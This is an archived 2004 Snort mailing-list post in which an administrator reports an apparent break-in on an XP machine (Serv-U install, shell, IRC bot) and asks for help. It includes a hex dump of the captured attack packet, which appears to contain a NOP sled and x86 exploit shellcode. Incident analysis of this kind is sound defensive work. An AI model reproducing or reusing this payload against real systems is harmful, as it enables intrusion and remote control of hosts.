Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Compromising Packet...

From: "Dusty Hall" <halljer () auburn edu>
Date: Mon, 26 Jan 2004 11:14:45 -0600
I'm curious to know if anyone has seen anything like this before.  A few
packets were sent to port 2502... a few seconds later port 2503 was
opened up with Serv-U installed; tlist.exe and kill.exe were uploaded
and then they had a shell.  After that it looks like "SUB0T" was setup,
irc channel and pass were captured in other packets.  Its supposedly an
XP system with current patches.

Any help would be greatly appreciated.

Thanks,


-Dusty



This is the first packet Snort captured:

05:26:23.679984 x.x.x.x.3882 > x.x.x.x.2502: P
945899367:945900747(1380) ack 413273664 win 65535 (DF)
0x0000   4500 058c dd21 4000 3206 3b0a xxxx xxxx       
E....!@.2.;.Q9..
0x0010   xxxx xxxx 0f2a 09c6 3861 4767 18a2 0e40       
.....*..8aGg...@
0x0020   5018 ffff bb03 0000 00c3 9090 9090 9090       
P...............
0x0030   9090 9090 9090 9090 ff25 dc80 4000 ff25       
.........%..@..%
0x0040   d880 4000 ff25 e480 4000 ff25 e880 4000       
..@..%..@..%..@.
0x0050   568b 7424 0857 83cf ff8b 460c a840 7405       
V.t$.W....F..@t.
0x0060   83c8 ffeb 3aa8 8374 3456 e8c9 0900 0056       
....:..t4V.....V
0x0070   8bf8 e85b 0900 00ff 7610 e8a0 0800 0083       
...[....v.......
0x0080   c40c 85c0 7d05 83cf ffeb 128b 461c 85c0       
....}.......F...
0x0090   740b 50e8 5808 0000 8366 1c00 598b c783       
t.P.X....f..Y...
0x00a0   660c 005f 5ec3 cccc 8d42 ff5b c38d a424       
f.._^....B.[...$
0x00b0   0000 0000 8d64 2400 33c0 8a44 2408 538b       
.....d$.3..D$.S.
0x00c0   d8c1 e008 8b54 2408 f7c2 0300 0000 7413       
.....T$.......t.
0x00d0   8a0a 4238 d974 d184 c974 51f7 c203 0000       
..B8.t...tQ.....
0x00e0   0075 ed0b d857 8bc3 c1e3 1056 0bd8 8b0a       
.u...W.....V....
0x00f0   bfff fefe 7e8b c18b f733 cb03 f003 f983       
....~....3......
0x0100   f1ff 83f0 ff33 cf33 c683 c204 81e1 0001       
.....3.3........
0x0110   0181 751c 2500 0101 8174 d325 0001 0101       
..u.%....t.%....
0x0120   7508 81e6 0000 0080 75c4 5e5f 5b33 c0c3       
u.......u.^_[3..
0x0130   8b42 fc38 d874 3684 c074 ef38 dc74 2784       
.B.8.t6..t.8.t'.
0x0140   e474 e7c1 e810 38d8 7415 84c0 74dc 38dc       
.t....8.t...t.8.
0x0150   7406 84e4 74d4 eb96 5e5f 8d42 ff5b c38d       
t...t...^_.B.[..
0x0160   42fe 5e5f 5bc3 8d42 fd5e 5f5b c38d 42fc       
B.^_[..B.^_[..B.
0x0170   5e5f 5bc3 558b ec83 7d0c 0053 8b5d 0857       
^_[.U...}..S.].W
0x0180   8bfb 7f04 33c0 eb36 ff4d 0c56 742a 8b75       
....3..6.M.Vt*.u
0x0190   10ff 4e04 780a 8b0e 0fb6 0141 890e eb07       
..N.x......A....
0x01a0   56e8 6409 0000 5983 f8ff 7416 8807 473c       
V.d...Y...t...G<
0x01b0   0a74 05ff 4d0c 75d9 8027 008b c35e 5f5b       
.t..M.u..'...^_[
0x01c0   5dc3 3b7d 0875 f133 dbeb f053 56be 409a       
].;}.u.3...SV.@.
0x01d0   4000 5756 e80a 0a00 008b f88d 4424 1850       
@.WV........D$.P
0x01e0   ff74 2418 56e8 c30a 0000 5657 8bd8 e87d       
.t$.V.....VW...}
0x01f0   0a00 0083 c418 8bc3 5f5e 5bc3 e8df 1400       
........_^[.....
0x0200   0085 c075 01c3 50ff 7424 10ff 7424 10ff       
...u..P.t$..t$..
0x0210   7424 10e8 5813 0000 83c4 10c3 6a40 ff74       
t$..X.......j@.t
0x0220   240c ff74 240c e8d1 ffff ff83 c40c c353       
$..t$..........S
0x0230   5556 578b 7c24 1483 3dac 9e40 0001 7e0f       
UVW.|$..=..@..~.
0x0240   0fb6 076a 0850 e80d 1500 0059 59eb 0f0f       
...j.P.....YY...
0x0250   b607 8b0d a09c 4000 8a04 4183 e008 85c0       
......@...A.....
0x0260   7403 47eb d20f b637 4783 fe2d 8bee 7405       
t.G....7G..-..t.
0x0270   83fe 2b75 040f b637 4733 db83 3dac 9e40       
..+u...7G3..=..@
0x0280   0001 7e0c 6a04 56e8 cc14 0000 5959 eb0b       
..~.j.V.....YY..
0x0290   a1a0 9c40 008a 0470 83e0 0485 c074 0d8d       
...@...p.....t..
0x02a0   049b 8d5c 46d0 0fb6 3747 ebcf 83fd 2d8b       
...\F...7G....-.
0x02b0   c375 02f7 d85f 5e5d 5bc3 ff74 2404 e86c       
.u..._^][..t$..l
0x02c0   ffff ff59 c355 8bec 8b55 0853 5633 f633       
...Y.U...U.SV3.3
0x02d0   c03b d657 0f84 b800 0000 8b7d 103b fe0f       
.;.W.......}.;..
0x02e0   84da 0000 0039 3520 a342 0075 293b fe0f       
.....95..B.u);..
0x02f0   86ca 0000 008b 4d0c 03c8 660f b631 6689       
......M...f..1f.
0x0300   3280 3900 0f84 b500 0000 4042 423b c772       
2.9.......@BB;.r 
0x0310   e4e9 a900 0000 8b5d 0c8b 3568 8040 0057       
.......]..5h.@.W
0x0320   526a ff53 6a09 ff35 30a3 4200 ffd6 85c0       
Rj.Sj..50.B.....
0x0330   0f85 8800 0000 ff15 6480 4000 83f8 7a74       
........d. ()    zt
0x0340   0fc7 05cc a242 002a 0000 0083 c8ff eb6f       
.....B.*.......o
0x0350   8d4f ff8b c389 4d0c 8a08 84c9 741c 8b15       
.O....M.....t...
0x0360   a09c 4000 0fb6 c9f6 444a 0180 7401 408b       
..@.....DJ..t.@.
0x0370   4d0c 40ff 4d0c 85c9 75de 572b c3ff 7508       
M.@.M...u.W+..u.
0x0380   5053 6a01 ff35 30a3 4200 ffd6 85c0 752f       
PSj..50.B.....u/
0x0390   ebaf 3935 20a3 4200 750b ff75 0ce8 7614       
..95..B.u..u..v.
0x03a0   0000 59eb 1a56 566a ffff 750c 6a09 ff35       
..Y..VVj..u.j..5
0x03b0   30a3 4200 ff15 6880 4000 3bc6 7483 485f       
0.B...h.@.;.t.H_
0x03c0   5e5b 5dc3 558b ec83 ec20 8b45 0856 8945       
^[].U......E.V.E
0x03d0   e889 45e0 8d45 10c7 45ec 4200 0000 508d       
..E..E..E.B...P.
0x03e0   45e0 ff75 0cc7 45e4 ffff ff7f 50e8 bb08       
E..u..E.....P...
0x03f0   0000 83c4 0cff 4de4 8bf0 7808 8b45 e080       
......M...x..E..
0x0400   2000 eb0d 8d45 e050 6a00 e886 1500 0059       
.....E.Pj......Y
0x0410   598b c65e c9c3 cccc 513d 0010 0000 8d4c       
Y..^....Q=.....L
0x0420   2408 7214 81e9 0010 0000 2d00 1000 0085       
$.r.......-.....
0x0430   013d 0010 0000 73ec 2bc8 8bc4 8501 8be1       
.=....s.+.......
0x0440   8b08 8b40 0450 c355 8bec 83ec 1056 6840       
...@.P.U.....Vh@
0x0450   8140 00e8 9319 0000 5933 f68b 4d08 8945       
.@......Y3..M..E
0x0460   f03b ce75 183b c675 0433 c0eb 6d56 50e8       
.;.u.;.u.3..mVP.
0x0470   3319 0000 f7d8 591b c059 40eb 5d3b c6c7       
3.....Y..Y@.];..
0x0480   45f4 3c81 4000 894d f889 75fc 7424 8d4d       
E.<.@..M..u.t$.M
0x0490   f056 5150 56e8 7317 0000 83c4 1083 f8ff       
.VQPV.s.........
0x04a0   7538 8b0d cca2 4200 83f9 0274 0583 f90d       
u8....B....t....
0x04b0   7528 f605 d9a2 4200 80c7 45f0 3081 4000       
u(....B...E.0.@.
0x04c0   7507 c745 f028 8140 008d 45f0 5650 ff75       
u..E.(.@..E.VP.u
0x04d0   f056 e8d3 1500 0083 c410 5ec9 c355 8bec       
.V........^..U..
0x04e0   5657 ff75 08e8 f906 0000 8bf0 8d45 1050       
VW.u.........E.P
0x04f0   ff75 0cff 7508 e8b2 0700 00ff 7508 8bf8       
.u..u.......u...
0x0500   56e8 6a07 0000 83c4 188b c75f 5e5d c3cc       
V.j........_^]..
0x0510   cccc cccc cccc cccc 8b4c 240c 5785 c90f       
.........L$.W...
0x0520   84a7 0000 008b 7c24 0856 f7c7 0300 0000       
......|$.V......
0x0530   5374 0f8a 0747 84c0 7439 f7c7 0300 0000       
St...G..t9......
0x0540   75f1 8b07 baff fefe 7e03 d083 f0ff 33c2       
u.......~.....3.
0x0550   83c7 04a9 0001 0181 74e8 8b47 fc84 c074       
........t..G...t
0x0560   1f84 e474 16a9 0000 ff00 740a a900 0000       
...t......t.....
0x0570   ff75 cf4f eb0d 83ef 02eb 0883 ef03 eb03       
.u.O............
0x0580   83ef 048b 7424 14f7 c603 0000                  ....t$......





-------------------------------------------------------
The SF.Net email is sponsored by EclipseCon 2004
Premiere Conference on Open Tools Development and Integration
See the breadth of Eclipse activity. February 3-5 in Anaheim, CA.
http://www.eclipsecon.org/osdn
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Previous By Date Next
Previous By Thread Next

Current thread: